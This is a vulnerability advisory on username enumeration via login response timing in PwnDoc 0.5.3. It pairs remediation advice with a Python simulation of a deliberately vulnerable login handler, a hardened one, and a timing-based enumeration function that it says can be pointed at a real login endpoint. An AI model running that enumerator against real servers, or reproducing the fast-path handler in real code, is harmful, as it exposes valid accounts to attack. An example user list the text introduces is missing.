PwnDoc <= 0.5.3 - Username Enumeration via response timings

CVE Detail

PwnDoc through 0.5.3 might allow remote attackers to identify valid user account names by leveraging response timings for authentication attempts.

Product | CVE | Owner | CVSSv3 Score | CWE
PwnDoc  |     |       | 5.3 Medium   |

Exploitation Steps

Users registered in PwnDoc (tested on 0.5.3, as of 2022-07-19, and on previous versions) can be enumerated by observing the web server's response time to login requests. For example, suppose the following users were registered on PwnDoc:

A dictionary attack then submits each candidate username from a prepared list in a login POST request (with an arbitrary password) and records the server's response time for every attempt.

Valid accounts are the ones whose login request takes measurably longer; non-existent usernames are answered faster (typically because the server skips the costly password-hash check when the user lookup returns nothing), so an attacker can recover every valid username by sorting the attempts by response time.

Success depends heavily on the stability of the server and of the network path between the hosts, so each username should be measured several times and the median (not a single sample) compared against a known-invalid baseline. As a remediation, the login handler should take the same time whether or not the username exists: either add a compensating delay so every login request has a balanced response time, or always perform the password-hash comparison (against a dummy hash when no user is found) so there is no fast path to measure.
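The measurement procedure above and the remediation can both be shown in one runnable simulation. This is an added example, not PwnDoc's code and not part of the original advisory: `vulnerable_login` models a server that only runs the slow password hash when the username exists, `hardened_login` models the balanced variant that always pays the hash cost, and `enumerate_users` is the timing classifier an attacker would run. The user list, passwords, PBKDF2 hash (standing in for whatever hash the real server uses) and the 2 ms jitter margin are all constructed assumptions; against a live target, `login_fn` would wrap an HTTP POST to the login endpoint and the margin would need to be tuned to the observed network jitter.

```python
import hashlib
import hmac
import os
import statistics
import time

# Constructed sample data (assumption): two registered users with slow PBKDF2
# hashes. The slow hash stands in for the server's real password verification.
_ITERATIONS = 100_000
_SALT = os.urandom(16)


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"admin": _hash("Winter2022!"), "alice": _hash("hunter2")}
# Hash of a throwaway password, used so that unknown users still cost a full hash.
_DUMMY_HASH = _hash("dummy-password-never-valid")


def vulnerable_login(username: str, password: str) -> bool:
    """Only hashes when the user exists: unknown names return on the fast path."""
    stored = USERS.get(username)
    if stored is None:
        return False  # fast path: no hash computed, measurably shorter response
    return hmac.compare_digest(_hash(password), stored)


def hardened_login(username: str, password: str) -> bool:
    """Always pays the hash cost, so valid and invalid names take the same time."""
    stored = USERS.get(username, _DUMMY_HASH)
    matched = hmac.compare_digest(_hash(password), stored)
    # The dummy hash must never grant access, even if someone guesses its input.
    return matched and username in USERS


def median_login_time(login_fn, username: str, samples: int = 5) -> float:
    """Median wall-clock time of `samples` failed login attempts for one name."""
    timings = []
    for _ in range(samples):
        start = time.perf_counter()
        login_fn(username, "definitely-wrong-password")
        timings.append(time.perf_counter() - start)
    return statistics.median(timings)


def enumerate_users(login_fn, wordlist, samples: int = 5):
    """Return names whose median login time stands out from a known-invalid baseline.

    The baseline is a random username that cannot exist. A name is reported as
    valid when its median exceeds twice the baseline plus a 2 ms margin; the
    margin (an assumption for a local run) absorbs timer and scheduling jitter.
    """
    bogus = "zz-no-such-user-" + os.urandom(4).hex()
    baseline = median_login_time(login_fn, bogus, samples)
    threshold = 2 * baseline + 0.002
    return [name for name in wordlist
            if median_login_time(login_fn, name, samples) > threshold]


if __name__ == "__main__":
    wordlist = ["root", "admin", "alice", "bob", "test"]
    print("vulnerable server leaks:", enumerate_users(vulnerable_login, wordlist))
    print("hardened server leaks:  ", enumerate_users(hardened_login, wordlist))
```

Run against the vulnerable handler the classifier returns exactly the registered names; against the hardened handler it returns nothing, because every request costs one hash regardless of whether the lookup succeeded. The same `enumerate_users` function works unchanged when `login_fn` is replaced by a wrapper that sends the real POST request, which is the point of separating measurement from transport.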
